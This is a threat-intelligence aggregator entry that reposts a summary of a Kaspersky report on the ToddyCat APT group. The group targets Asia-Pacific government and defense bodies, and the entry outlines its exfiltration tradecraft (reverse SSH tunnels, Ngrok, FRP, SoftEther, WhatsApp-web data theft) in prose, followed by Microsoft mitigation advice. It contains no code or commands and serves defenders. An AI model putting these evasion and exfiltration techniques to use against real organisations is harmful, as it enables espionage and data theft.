One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8489234 |
| Date de publication | 2024-04-26 19:12:08 (vue: 2024-04-26 20:08:19) |
| Titre | Todckat APT Group Honne les tactiques d'expiltration des données, exploite les outils légitimes ToddyCat APT Group Hones Data Exfiltration Tactics, Exploits Legitimate Tools |
| Texte | #### Targeted Geolocations - Oceania - Southeast Asia - South Asia - East Asia - Central Asia #### Targeted Industries - Government Agencies & Services - Defense ## Snapshot Kaspersky reports the APT group ToddyCat has been observed targeting governmental organizations, particularly defense-related ones in the Asia-Pacific region, with the goal of stealing sensitive information on an industrial scale. ## Description They employ various tools and techniques, including traffic tunneling and the creation of reverse SSH tunnels, to maintain constant access to compromised infrastructure. The attackers utilize disguised OpenSSH private key files, execute scripts to modify folder permissions, create SSH tunnels to redirect network traffic, and employ the SoftEther VPN package to potentially facilitate unauthorized access and data exfiltration. Additionally, they use various files and techniques, such as concealing file purposes, copying files through shared resources, and tunneling to legitimate cloud providers, to gain access to victim hosts and evade detection. The threat actors initially gain access to systems by installing servers, modifying server settings, and utilizing tools like Ngrok and Krong to redirect C2 traffic and create tunnels for unauthorized access. They also employ the FRP client, a data collection tool named "cuthead", and a tool called "WAExp" to search for and collect browser local storage files containing data from the web version of WhatsApp. The attackers demonstrate a sophisticated and evolving approach to data collection and exfiltration, utilizing multiple tools and techniques to achieve their objectives. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of Information stealer threats. - Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email. - Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](https://learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy?ocid=magicti_ta_learndoc) from all devices, in all locations, at all times. - Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. [Refer to this article](https://learn.microsoft.com/azure/active-directory/authentic |
| Envoyé | Oui |
| Condensat | #### 365 365/security/defender 365/security/office about access accounts achieve acquired actors additionally advice: against age agencies all also antivirus app approach apps apt are article asia attachments attack attacker attackers authentication authenticator auto based been block blocks browser browsers bullet called can central check classes click clicking client cloud code collect collection com/azure/active com/deployedge/microsoft com/microsoft com/toddycat common compromised concealing configure constant containing copying cover coverage create creation credential credentials criterion customers cuthead data defender defense delete delivered demonstrate description detection devices different directory/authentication/concept directory/identity disguised due east edge email emails employ employees enable enabled encourage endpoint/attack endpoint/configure endpoint/detect enforce enhanced ensure enterprise entire equivalent evade even evolving example excluded executable execute execution exfiltration exploits extraction facilitate features fido file files filtering first folder following from frp gain geolocations goal government governmental group guidance has hello hones host hosts hour https://learn https://securelist identifies identity impact inbound including industrial industries infections information infostealer infostealers infrastructure initially installing intelligence intrusions kaspersky key keys krong learndoc learndoc#block learning legitimate like links list local locations machine mail maintain majority malicious malware managed many meet methods mfa microsoft mitigation mitigations mode modify modifying more multiple named network new newly ngrok not obfuscated objectives observed oceania ocid=magicti off offer office ones openssh organizations other pacific package particularly password passwordless passwords permissions personal phishing phones points policies policy polymorphic possible potentially prevalence prevent private product prompt protection protection/howto protections providers pua purge purposes ransomware rapidly recheck recommendations recommends redirect reduce reduction refer reference references region related remind remove reports require requires resources response reverse rules running safe scale scam scripts search secured security/defender security/safe security/zero sensitive sent server servers services settings shared should sight sites smartscreen snapshot softether sophisticated south southeast spam specific spoofed ssh stealer stealing stop storage stored strictly succeeded such support surface sweeping sync#sync syncing systems tab tactics targeted targeting techniques theft threat threats through times toddycat tool tools tools/112443/#new traffic trusted tunneling tunnels turn typed unauthorized unknown unless unwanted use used users uses using utilize utilizing variants various vaults version victim vpn waexp web websites whatsapp when where which windows workplace your “yes” |
| Tags | Ransomware Spam Malware Tool Threat Industrial Cloud |
| Stories | |
| Notes | ★★ |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.